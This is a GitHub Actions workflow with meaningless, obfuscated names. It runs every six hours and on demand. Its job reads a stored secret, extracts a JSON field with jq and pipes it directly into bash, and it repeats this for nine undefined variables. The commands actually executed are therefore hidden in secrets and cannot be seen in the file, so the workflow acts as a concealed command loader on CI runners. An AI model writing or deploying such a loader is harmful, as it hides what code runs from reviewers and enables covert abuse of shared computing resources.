name: strengthteammate

on:
  workflow_dispatch:
  schedule:
    - cron: '44 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: strengthteammate
        env:
          xcx19: ${{ secrets.xcx19 }}
        run: |
          echo $xcx19 | jq -r .at27 | /bin/bash
          echo $gfty4 | jq -r .qt364 | /bin/bash
          echo $r67 | jq -r .fymeu56 | /bin/bash
          echo $rnjj3 | jq -r .ov2 | /bin/bash
          echo $j85805 | jq -r .tjw94947 | /bin/bash
          echo $thbzv5 | jq -r .v23612 | /bin/bash
          echo $gecl1 | jq -r .sieo0 | /bin/bash
          echo $lr88 | jq -r .l6 | /bin/bash
          echo $dgs8 | jq -r .vuk1441 | /bin/bash
          echo $hzikf6642 | jq -r .sd2491 | /bin/bash

